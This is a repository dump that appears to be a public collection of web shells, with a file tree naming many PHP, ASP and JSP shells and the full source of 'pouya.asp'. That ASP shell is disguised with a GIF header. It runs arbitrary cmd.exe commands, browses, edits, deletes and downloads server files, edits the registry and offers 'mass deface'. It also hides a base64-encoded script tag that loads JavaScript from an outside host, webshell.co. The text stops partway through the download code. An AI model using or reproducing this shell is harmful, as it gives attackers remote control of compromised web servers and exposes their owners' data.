├── .github └── FUNDING.yml ├── ASP └── pouya.asp ├── CODE_OF_CONDUCT.md ├── JSP └── shell.jsp ├── LICENSE ├── PHP ├── TwemlowsShell.php ├── TwemlowsWebShell.php ├── alfa │ ├── alfav3-encoded.php │ ├── alfav4.1-decoded.php │ └── alfav4.1-encoded.php ├── andela.php ├── bloodsecv4.php ├── by.php ├── c99ud.php ├── cmd.php ├── configkillerionkros.php ├── mini.php ├── obfuscated-punknopass.php ├── punk-nopass.php ├── punkholic.php ├── r57.php ├── smevk.php └── wso2.8.5.php ├── README.md ├── shell.asp ├── shell.jsp └── shell.php /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: TheBinitGhimire 4 | issuehunt: thebinitghimire 5 | custom: ['https://btc.com/37uVA5kQfqStu8GbruwVcLEs6uxrVSXicN'] 6 | -------------------------------------------------------------------------------- /ASP/pouya.asp: -------------------------------------------------------------------------------- 1 | GIF89a; 2 | <%@ LANGUAGE = VBScript.Encode%> 3 | <%//**Start Encode 4 | On Error Resume Next 5 | 6 | Dim myFSO,showdisks 7 | Set myFSO = CreateObject ("Scripting.FileSystemObject") 8 | showdisks=FALSE 9 | 10 | Server.ScriptTimeOut = 7200 11 | Class FileUploader 12 | Public Files 13 | Private mcolFormElem 14 | Private Sub Class_Initialize() 15 | Set Files = Server.CreateObject("Scripting.Dictionary") 16 | Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") 17 | End Sub 18 | Private Sub Class_Terminate() 19 | If IsObject(Files) Then 20 | Files.RemoveAll() 21 | Set Files = Nothing 22 | End If 23 | If IsObject(mcolFormElem) Then 24 | mcolFormElem.RemoveAll() 25 | Set mcolFormElem = Nothing 26 | End If 27 | End Sub 28 | Public Property Get Form(sIndex) 29 | Form = "" 30 | If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) 31 | End Property 32 | Public Default Sub Upload() 33 | Dim biData, sInputName 34 | Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos 35 | Dim nPosFile, nPosBound 36 | biData = Request.BinaryRead(Request.TotalBytes) 37 | nPosBegin = 1 38 | nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) 39 | If (nPosEnd-nPosBegin) <= 0 Then Exit Sub 40 | vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) 41 | nDataBoundPos = InstrB(1, biData, vDataBounds) 42 | Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) 43 | nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) 44 | nPos = InstrB(nPos, biData, CByteString("name=")) 45 | nPosBegin = nPos + 6 46 | nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) 47 | sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) 48 | nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) 49 | nPosBound = InstrB(nPosEnd, biData, vDataBounds) 50 | If nPosFile <> 0 And nPosFile < nPosBound Then 51 | Dim oUploadFile, sFileName 52 | Set oUploadFile = New UploadedFile 53 | nPosBegin = nPosFile + 10 54 | nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) 55 | sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) 56 | oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) 57 | nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) 58 | nPosBegin = nPos + 14 59 | nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) 60 | oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) 61 | nPosBegin = nPosEnd+4 62 | nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 63 | oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) 64 | If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile 65 | Else 66 | nPos = InstrB(nPos, biData, CByteString(Chr(13))) 67 | nPosBegin = nPos + 4 68 | nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 69 | If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) 70 | End If 71 | nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) 72 | Loop 73 | End Sub 74 | Private Function CByteString(sString) 75 | Dim nIndex 76 | For nIndex = 1 to Len(sString) 77 | CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) 78 | Next 79 | End Function 80 | Private Function CWideString(bsString) 81 | Dim nIndex 82 | CWideString ="" 83 | For nIndex = 1 to LenB(bsString) 84 | CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 85 | Next 86 | End Function 87 | End Class 88 | Class UploadedFile 89 | Public ContentType 90 | Public FileName 91 | Public FileData 92 | Public Property Get FileSize() 93 | FileSize = LenB(FileData) 94 | End Property 95 | Public Sub SaveToDisk(sPath) 96 | Dim oFS, oFile 97 | Dim nIndex 98 | If sPath = "" Or FileName = "" Then Exit Sub 99 | If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" 100 | Set oFS = Server.CreateObject("Scripting.FileSystemObject") 101 | If Not oFS.FolderExists(sPath) Then Exit Sub 102 | Set oFile = oFS.CreateTextFile(sPath & FileName, True) 103 | For nIndex = 1 to LenB(FileData) 104 | oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) 105 | Next 106 | oFile.Close 107 | End Sub 108 | Public Sub SaveToDatabase(ByRef oField) 109 | If LenB(FileData) = 0 Then Exit Sub 110 | If IsObject(oField) Then 111 | oField.AppendChunk FileData 112 | End If 113 | End Sub 114 | End Class 115 | startcode = ".:: Pouya_Server Shell ::." 116 | endocde = "" 117 | onlinehelp = ".:: ONLINE HELP ::.
" 118 | Function HexConv(hexVar) 119 | Dim hxx, hxx_var, multiply 120 | IF hexVar <> "" THEN 121 | hexVar = UCASE(hexVar) 122 | hexVar = StrReverse(hexVar) 123 | DIM hx() 124 | REDIM hx(LEN(hexVar)) 125 | hxx = 0 126 | hxx_var = 0 127 | FOR hxx = 1 TO LEN(hexVar) 128 | IF multiply = "" THEN multiply = 1 129 | hx(hxx) = mid(hexVar,hxx,1) 130 | hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var 131 | multiply = (multiply * 16) 132 | NEXT 133 | hexVar = hxx_var 134 | HexConv = hexVar 135 | END IF 136 | End Function 137 | cprthtml = ".:: Smart.Shell 1.0 © BY P0uY@ - _$3r\/3R ::." 138 | Dim Base64Chars 139 | Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" & _ 140 | "abcdefghijklmnopqrstuvwxyz" & _ 141 | "0123456789" & _ 142 | "+/" 143 | Public Function base64_encode( byVal strIn ) 144 | Dim c1, c2, c3, w1, w2, w3, w4, n, strOut 145 | For n = 1 To Len( strIn ) Step 3 146 | c1 = Asc( Mid( strIn, n, 1 ) ) 147 | c2 = Asc( Mid( strIn, n + 1, 1 ) + Chr(0) ) 148 | c3 = Asc( Mid( strIn, n + 2, 1 ) + Chr(0) ) 149 | w1 = Int( c1 / 4 ) : w2 = ( c1 And 3 ) * 16 + Int( c2 / 16 ) 150 | If Len( strIn ) >= n + 1 Then 151 | w3 = ( c2 And 15 ) * 4 + Int( c3 / 64 ) 152 | Else 153 | w3 = -1 154 | End If 155 | If Len( strIn ) >= n + 2 Then 156 | w4 = c3 And 63 157 | Else 158 | w4 = -1 159 | End If 160 | strOut = strOut + mimeencode( w1 ) + mimeencode( w2 ) + _ 161 | mimeencode( w3 ) + mimeencode( w4 ) 162 | Next 163 | base64_encode = strOut 164 | End Function 165 | 166 | Private Function mimeencode( byVal intIn ) 167 | If intIn >= 0 Then 168 | mimeencode = Mid( Base64Chars, intIn + 1, 1 ) 169 | Else 170 | mimeencode = "" 171 | End If 172 | End Function 173 | 174 | Public Function base64_decode( byVal strIn ) 175 | Dim w1, w2, w3, w4, n, strOut 176 | For n = 1 To Len( strIn ) Step 4 177 | w1 = mimedecode( Mid( strIn, n, 1 ) ) 178 | w2 = mimedecode( Mid( strIn, n + 1, 1 ) ) 179 | w3 = mimedecode( Mid( strIn, n + 2, 1 ) ) 180 | w4 = mimedecode( Mid( strIn, n + 3, 1 ) ) 181 | If w2 >= 0 Then _ 182 | strOut = strOut + _ 183 | Chr( ( ( w1 * 4 + Int( w2 / 16 ) ) And 255 ) ) 184 | If w3 >= 0 Then _ 185 | strOut = strOut + _ 186 | Chr( ( ( w2 * 16 + Int( w3 / 4 ) ) And 255 ) ) 187 | If w4 >= 0 Then _ 188 | strOut = strOut + _ 189 | Chr( ( ( w3 * 64 + w4 ) And 255 ) ) 190 | Next 191 | base64_decode = strOut 192 | End Function 193 | 194 | Private Function mimedecode( byVal strIn ) 195 | If Len( strIn ) = 0 Then 196 | mimedecode = -1 : Exit Function 197 | Else 198 | mimedecode = InStr( Base64Chars, strIn ) - 1 199 | End If 200 | End Function 201 | 202 | dim myStringo 203 | stringo = "PHNjcmlwdCB0eXBlPSJ0ZXh0L0phdmFTY3JpcHQiIHNyYz0i" 204 | stringo_1 = "aHR0cDovL3dlYnNoZWxsLmNvL3doby9tYWluLmpzIj48L3NjcmlwdD4" 205 | myStringo = base64_decode(stringo+stringo_1) 206 | 207 | Function get_hxno(ghx) 208 | If ghx = "A" Then 209 | ghx = 10 210 | ElseIf ghx = "B" Then 211 | ghx = 11 212 | ElseIf ghx = "C" Then 213 | ghx = 12 214 | ElseIf ghx = "D" Then 215 | ghx = 13 216 | ElseIf ghx = "E" Then 217 | ghx = 14 218 | ElseIf ghx = "F" Then 219 | ghx = 15 220 | End If 221 | get_hxno = ghx 222 | End Function 223 | 224 | keydec=".:: Smart.Shell 1.0 © BY P0Uy@_$3r\/3R - ::." 225 | Function showobj(objpath) 226 | showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath)) 227 | End Function 228 | Function showobjpath(objpath) 229 | showobjpath = Left(objpath,InstrRev(objpath,"\")) 230 | End Function 231 | Function checking(a,b) 232 | ' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then 233 | ' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error" 234 | ' Response.Redirect(pagina) 235 | ' End If 236 | End Function 237 | Sub hdr() 238 | response.write(myStringo) 239 | Response.Write startcode 240 | Response.Write keydec 241 | Response.Write "
" 242 | End Sub 243 | 244 | sub araBul(path_,ara_) 245 | on error resume next 246 | If Len(path_) > 0 Then 247 | cur = path_&"\" 248 | If cur = "\\" Then cur = "" 249 | parent = "" 250 | If InStrRev(cur,"\") > 0 Then 251 | parent = Left(cur, InStrRev(cur, "\", Len(cur)-1)) 252 | End If 253 | Else 254 | cur = "" 255 | End If 256 | 257 | Set f = myFSO.GetFolder(cur) 258 | 259 | Set fc = f.Files 260 | For Each f1 In fc 261 | if lcase(InStr(1,f1.name,lcase(ara_)))>0 then 262 | downStr = "Í" 263 | if lcase(ara_)="mdb" then 264 | Response.Write downStr&"û * "& f1.path &" ["&f1.size&"]"&"
" 265 | else 266 | Response.Write downStr&"û! - "& f1.path &" ["&f1.size&"]
" 267 | end if 268 | end if 269 | Next 270 | 271 | Set fs = f.SubFolders 272 | For Each f1 In fs 273 | araBul f1.path,ara_ 274 | Next 275 | Set f = Nothing 276 | Set fc = Nothing 277 | Set fs = Nothing 278 | end sub 279 | 280 | 281 | Sub showcontent() 282 | showdisks=TRUE 283 | Response.Write ".:: DRIVES ::.
.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "

" 284 | If Trim(Request.QueryString("raiz")) = "root" Then 285 | Set fs=Server.Createobject("Scripting.FileSystemObject") 286 | Set drivecollection=fs.drives 287 | Response.Write "" 288 | For Each drive IN drivecollection 289 | str=drive.driveletter & ":" 290 | Response.Write "" & UCase(str) & "
" 291 | Select Case drive.DriveType 292 | Case 0 293 | tipodrive = "Unknown" 294 | nomedrive = drive.VolumeName 295 | Case 1 296 | tipodrive = "Removable" 297 | If drive.isready Then 298 | nomedrive = drive.VolumeName 299 | Else 300 | nomedrive = "" 301 | End If 302 | Case 2 303 | tipodrive = "Fixed" 304 | If drive.isready Then 305 | nomedrive = drive.VolumeName 306 | Else 307 | nomedrive = "" 308 | End If 309 | Case 3 310 | tipodrive = "Network" 311 | If drive.isready Then 312 | nomedrive = drive.ShareName 313 | Else 314 | nomedrive = "" 315 | End If 316 | Case 4 317 | tipodrive = "CD-Rom" 318 | If drive.isready Then 319 | nomedrive = drive.VolumeName 320 | Else 321 | nomedrive = "" 322 | End If 323 | Case 5 324 | tipodrive = "RAM Disk" 325 | If drive.isready Then 326 | nomedrive = drive.VolumeName 327 | Else 328 | nomedrive = "" 329 | End If 330 | End Select 331 | response.write "Type: " & tipodrive & "
" 332 | response.write "Name: " & nomedrive & "
" 333 | response.write "File System: " 334 | If drive.isready Then 335 | set sp=fs.getdrive(str) 336 | response.write sp.filesystem & "
" 337 | Else 338 | response.write "-
" 339 | End If 340 | Response.Write "Disk Space: " 341 | If drive.isready Then 342 | freespace = (drive.AvailableSpace / 1048576) 343 | set sp=fs.getdrive(str) 344 | response.write(Round(freespace,1) & " MB
") 345 | Else 346 | response.write("-
") 347 | End If 348 | Response.Write "Total Space: " 349 | If drive.isready Then 350 | totalspace = (drive.TotalSize / 1048576) 351 | set sp=fs.getdrive(str) 352 | response.write(Round(totalspace,1) & " MB
") 353 | Else 354 | response.write("-
") 355 | End If 356 | Response.Write "
" 357 | Next 358 | Response.Write "" 359 | Set fs = Nothing 360 | Set drivecollection = Nothing 361 | set sp=Nothing 362 | Else 363 | If Trim(Request.QueryString("raiz")) = "" Then 364 | caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) 365 | pos = Instr(caminho,"\") 366 | pos2 = 1 367 | While pos2 <> 0 368 | If Instr(pos + 1,caminho,"\") <> 0 Then 369 | pos = Instr(pos + 1,caminho,"\") 370 | Else 371 | pos2 = 0 372 | End If 373 | Wend 374 | raiz = Left(caminho,pos) 375 | Else 376 | raiz = trim(Request.QueryString("raiz")) & "\" 377 | End If 378 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 379 | Set MonRep = ObjFSO.GetFolder(raiz) 380 | Set ColFolders = MonRep.SubFolders 381 | Set ColFiles0 = MonRep.Files 382 | Response.Write "MASS TEST IN " & UCase(raiz) & "

" 383 | Response.Write "MASS DEFACE IN " & UCase(raiz) & "

" 384 | Response.Write "UPLOAD FILE TO " & UCase(raiz) & "

" 385 | 386 | Response.Write "" 387 | Response.Write "PROMPT" 388 | Response.Write " - SYS INFO" 389 | Response.Write " - REGEDIT" 390 | Response.Write " - SEARCH" 391 | Response.Write " - EXECUTE SQL" 392 | Response.Write " - ABOUT" 393 | Response.Write "

" 394 | 395 | 396 | Response.Write "Root Folder: " & raiz & "

" 397 | If CInt(Len(raiz) - 1) <> 2 Then 398 | barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1 399 | backlevel = Left(raiz,barrapos) 400 | Response.Write "<DIR> . .
" 401 | Else 402 | Response.Write "<DIR> . . 
" 403 | End If 404 | Response.Write "" 405 | for each folderItem in ColFolders 406 | Response.Write "" 407 | Response.Write "" 408 | Response.Write "" 409 | next 410 | Response.Write "
<DIR> " & showobj(folderItem.path) & "  << PUT  << Copy/Move  << Delete

" 411 | marcatabela = true 412 | for each FilesItem0 in ColFiles0 413 | If marcatabela = true then 414 | corfundotabela = " bgcolor=""#EEEEEE""" 415 | Else 416 | corfundotabela = "" 417 | End If 418 | Response.Write ":: " & showobj(FilesItem0.path) & "" 419 | marcatabela = NOT marcatabela 420 | next 421 | Response.Write "
  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     o.GET.o    o.REN.o    o.DEL.o    o.VIEW.o    o.EDIT.o    o.DOWNLOAD.o    o.FileCopy.o
" 422 | End If 423 | End Sub 424 | Select Case Trim(Request.QueryString("action")) 425 | Case "get" 426 | checa = checking(cprthtml,keydec) 427 | Call hdr() 428 | Response.Write copyright & onlinehelp 429 | caminho = Replace(Trim(Request.QueryString("path")),"|","\") 430 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 431 | Set MyFile = ObjFSO.GetFile(caminho) 432 | destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) 433 | MyFile.Copy (destino) 434 | If Err.Number = 0 Then 435 | Response.Write "


File: " & caminho & "
Copied to: " & destino 436 | End If 437 | Case "put" 438 | checa = checking(cprthtml,keydec) 439 | Call hdr() 440 | Response.Write copyright & onlinehelp 441 | If Trim(Request.QueryString("arquivo")) = "" Then 442 | caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) 443 | varpath = Trim(Request.QueryString("path")) 444 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 445 | Set MonRep = ObjFSO.GetFolder(caminho) 446 | Set ColFolders = MonRep.SubFolders 447 | Set ColFiles0 = MonRep.Files 448 | 449 | Response.Write "Select File:
" 450 | for each FilesItem0 in ColFiles0 451 | Response.Write "" 452 | next 453 | Response.Write "
:: " & showobj(FilesItem0.path) & "  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     :: SELECT ::
" 454 | Else 455 | destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\" 456 | arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\") 457 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 458 | Set MyFile = ObjFSO.GetFile(arquivo) 459 | MyFile.Copy (destino) 460 | If Err.Number = 0 Then 461 | Response.Write "


File: " & arquivo & "
Copied to: " & destino 462 | End If 463 | End If 464 | Case "del" 465 | checa = checking(cprthtml,keydec) 466 | Call hdr() 467 | Response.Write copyright & onlinehelp 468 | caminho = Replace(Trim(Request.QueryString("path")),"|","\") 469 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 470 | Set MyFile = ObjFSO.GetFile(caminho) 471 | MyFile.Delete 472 | If Err.Number = 0 Then 473 | Response.Write "" 474 | Response.Write "


Folder " & caminho & " Deleted.
" 475 | End If 476 | 477 | Case "fdel" 478 | checa = checking(cprthtml,keydec) 479 | Call hdr() 480 | Response.Write copyright & onlinehelp 481 | caminho = Replace(Trim(Request.QueryString("path")),"|","\") 482 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 483 | ObjFSO.DeleteFolder caminho 484 | If Err.Number = 0 Then 485 | Response.Write "" 486 | Response.Write "


File " & caminho & " Deleted.
" 487 | End If 488 | 489 | Case "ren" 490 | checa = checking(cprthtml,keydec) 491 | Call hdr() 492 | Response.Write copyright & onlinehelp 493 | If Trim(Request.QueryString("status")) <> "2" Then 494 | caminho = Replace(Trim(Request.QueryString("path")),"|","\") 495 | arquivo = showobj(caminho) 496 | Response.Write "
" & arquivo & "
" & _ 497 | "
" & _ 498 | "" & _ 499 | "" & _ 500 | "" & _ 501 | "New Name: " & _ 502 | "  " & _ 503 | "
" 504 | Else 505 | caminho = Replace(Trim(Request.QueryString("path")),"|","\") 506 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 507 | Set MyFile = ObjFSO.GetFile(caminho) 508 | destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname")) 509 | MyFile.Move (destino) 510 | If Err.Number = 0 Then 511 | Response.Write "


Arquivo: " & caminho & "
renomeado para: " & destino 512 | Response.Write "" 513 | End If 514 | End If 515 | Case "error" 516 | Response.Write "
CÓDIGO CORROMPIDO
CORRUPT CODE
" 517 | Case "cmd" 518 | checa = checking(cprthtml,keydec) 519 | Call hdr() 520 | Response.Write copyright & onlinehelp 521 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 522 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 523 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 524 | szCMD = Request.QueryString(".CMD") 525 | If (szCMD <> "") Then 526 | szTempFile = "c:\" & oFileSys.GetTempName( ) 527 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 528 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 529 | End If 530 | Response.Write "


" 531 | If (IsObject(oFile)) Then 532 | On Error Resume Next 533 | Response.Write "" 534 | Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
")," "," ") 535 | oFile.Close 536 | Call oFileSys.DeleteFile(szTempFile, True) 537 | End If 538 | Case "info" 539 | checa = checking(cprthtml,keydec) 540 | Call hdr() 541 | Response.Write copyright & onlinehelp 542 | Set WshNetwork = Server.CreateObject("WScript.Network") 543 | Set WshShell = Server.CreateObject("WScript.Shell") 544 | Set WshEnv = WshShell.Environment("SYSTEM") 545 | Response.Write "
" 546 | Response.Write "User Properties:
" 547 | Response.Write "UserName: " & WshNetwork.UserName & "
" 548 | Response.Write "Computer Name: " & WshNetwork.ComputerName & "
" 549 | Response.Write "User Domain: " & WshNetwork.UserDomain & "
" 550 | Set Drives = WshNetwork.EnumNetworkDrives 551 | For i = 0 to Drives.Count - 1 552 | Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
" 553 | Next 554 | Response.Write "
Cpu Information:
" 555 | Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
" 556 | Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
" 557 | Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
" 558 | Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
" 559 | Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
" 560 | Response.Write "
Operating System Information:
" 561 | Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
" 562 | Response.Write "Sistem OS: " & WshEnv("OS") & "
" 563 | Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
" 564 | Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
" 565 | Response.Write "Public Paths: " & WshEnv("PATH") & "
" 566 | Response.Write "Executables: " & WshEnv("PATHEXT") & "
" 567 | Response.Write "Prompt: " & WshEnv("PROMPT") & "
" 568 | Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
" 569 | Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
" 570 | Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
" 571 | Set Drives = Nothing 572 | Set WshNetwork = Nothing 573 | Set WshShell = Nothing 574 | Set WshEnv = Nothing 575 | Case "reg" 576 | checa = checking(cprthtml,keydec) 577 | Call hdr() 578 | Response.Write copyright & onlinehelp 579 | Set WshShell = Server.CreateObject("WScript.Shell") 580 | Response.Write "
Registry Editor:

" 581 | Select Case Trim(Request.QueryString("regaction")) 582 | Case "w" 583 | If Trim(Request.QueryString("process")) = "yes" Then 584 | Select Case Trim(Request.QueryString("type")) 585 | Case "1" 586 | teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ") 587 | Case "2" 588 | teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD") 589 | Case "3" 590 | teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY") 591 | Case "4" 592 | teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ") 593 | Case "5" 594 | teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ") 595 | End Select 596 | Response.Write "

Registry " 597 | Response.Write Trim(Request.QueryString("key")) & " Changed.
" 598 | Response.Write "

Main Menu
" 599 | Else 600 | Response.Write "" 601 | Response.Write "" 602 | Response.Write "" 603 | Response.Write "" 604 | Response.Write "" 605 | Response.Write "
ROOT KEY NAMEABREVIAÇÃO
HKEY_CURRENT_USER HKCU
HKEY_LOCAL_MACHINE HKLM
HKEY_CLASSES_ROOT HKCR
HKEY_USERS HKEY_USERS
HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG

" 606 | Response.Write "" 607 | Response.Write "" 608 | Response.Write "" 609 | Response.Write "" 610 | Response.Write "" 611 | Response.Write "
Type Description Figure
REG_SZ String String
REG_DWORD Number DWORD
REG_BINARY Binary VBArray DWORD
REG_EXPAND_SZ String Expand (ex. ""%windir%\\calc.exe"") String
REG_MULTI_SZ Array Of Strings VBArray Of Strings
" 612 | Response.Write "

" 613 | Response.Write "" 614 | Response.Write "" 615 | Response.Write "" 624 | Response.Write "
KEY:
( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
VALUE:
TYPE:
" 621 | Response.Write "" 622 | Response.Write "" 623 | Response.Write "
" 625 | Response.Write "

Main Menu
" 626 | End If 627 | Case "r" 628 | If Trim(Request.QueryString("process")) = "yes" Then 629 | Response.Write "" & Trim(Request.QueryString("key")) & "
" 630 | Response.Write "Value: " & WshShell.RegRead (Trim(Request.QueryString("key"))) 631 | Else 632 | Response.Write "
" 633 | Response.Write "KEY:
( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
" 634 | Response.Write "" 635 | Response.Write "" 636 | Response.Write "" 637 | Response.Write "" 638 | End If 639 | Response.Write "

Main Menu
" 640 | Case "d" 641 | If Trim(Request.QueryString("process")) = "yes" Then 642 | teste = WshShell.RegDelete (Trim(Request.QueryString("key"))) 643 | Response.Write "Chave " & Trim(Request.QueryString("key")) & " Deleted." 644 | Else 645 | Response.Write "
" 646 | Response.Write "KEY: ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
" 647 | Response.Write "" 648 | Response.Write "" 649 | Response.Write "" 650 | Response.Write "" 651 | End If 652 | Response.Write "

Main Menu
" 653 | Case Else 654 | Response.Write "WRITE VALUE

" 655 | Response.Write "READ VALUE

" 656 | Response.Write "DELETE KEY
" 657 | End Select 658 | Set WshShell = Nothing 659 | Case "txtview" 660 | checa = checking(cprthtml,keydec) 661 | Call hdr() 662 | Response.Write copyright & onlinehelp & "" 663 | file = Replace(Trim(Request.QueryString("file")),"|","\") 664 | Set fso = CreateObject("Scripting.FileSystemObject") 665 | Set a = fso.OpenTextFile(file) 666 | Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"
")," "," ") 667 | Set a = Nothing 668 | Set fso = Nothing 669 | Case "txtedit" 670 | checa = checking(cprthtml,keydec) 671 | Call hdr() 672 | Response.Write copyright & onlinehelp 673 | If Request.Form.Count = 0 Then 674 | file = Replace(Trim(Request.QueryString("file")),"|","\") 675 | Set fso = CreateObject("Scripting.FileSystemObject") 676 | Set a = fso.OpenTextFile(file) 677 | Response.Write "
" 678 | Response.Write "
" 679 | Response.Write "" 680 | Response.Write "     
" 681 | Set a = Nothing 682 | Set fso = Nothing 683 | Else 684 | Select Case Trim(Request.Form("savemethod")) 685 | Case "Save" 686 | Set fso = CreateObject("Scripting.FileSystemObject") 687 | novotexto = Trim(Request.Form("content")) 688 | novotexto = Split(novotexto,vbCrLf) 689 | Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2) 690 | For i = 0 To UBound(novotexto) 691 | objstream.WriteLine(novotexto(i)) 692 | Next 693 | objstream.Close 694 | Set objstream = Nothing 695 | Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & "" 696 | Case "Save as" 697 | Set fso = CreateObject("Scripting.FileSystemObject") 698 | novotexto = Trim(Request.Form("content")) 699 | novotexto = Split(novotexto,vbCrLf) 700 | caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" 701 | Set objstream = fso.CreateTextFile(caminho,true,false) 702 | For i = 0 To UBound(novotexto) 703 | objstream.WriteLine(novotexto(i)) 704 | Next 705 | objstream.Close 706 | Set objstream = Nothing 707 | Response.Write "
" 708 | Response.Write "
" 709 | Response.Write "" 710 | Response.Write "
" 711 | Case Else 712 | caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" 713 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 714 | Set MyFile = ObjFSO.GetFile(caminho) 715 | destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename")) 716 | MyFile.Move (destino) 717 | If Err.Number = 0 Then 718 | Response.Write "


Arquivo: " & destino & " salvo!" 719 | Response.Write "" 720 | End If 721 | End Select 722 | End If 723 | Case "download" 724 | Response.Buffer = True 725 | Response.Clear 726 | strFileName = Replace(Trim(Request.QueryString("file")),"|","\") 727 | strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\")) 728 | strFileType = Request.QueryString("type") 729 | if strFileType = "" then strFileType = "application/download" 730 | Set fso = Server.CreateObject("Scripting.FileSystemObject") 731 | Set f = fso.GetFile(strFilename) 732 | intFilelength = f.size 733 | Set f = Nothing 734 | Set fso = Nothing 735 | Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile 736 | Response.AddHeader "Content-Length", intFilelength 737 | Response.Charset = "UTF-8" 738 | Response.ContentType = strFileType 739 | Set Stream = Server.CreateObject("ADODB.Stream") 740 | 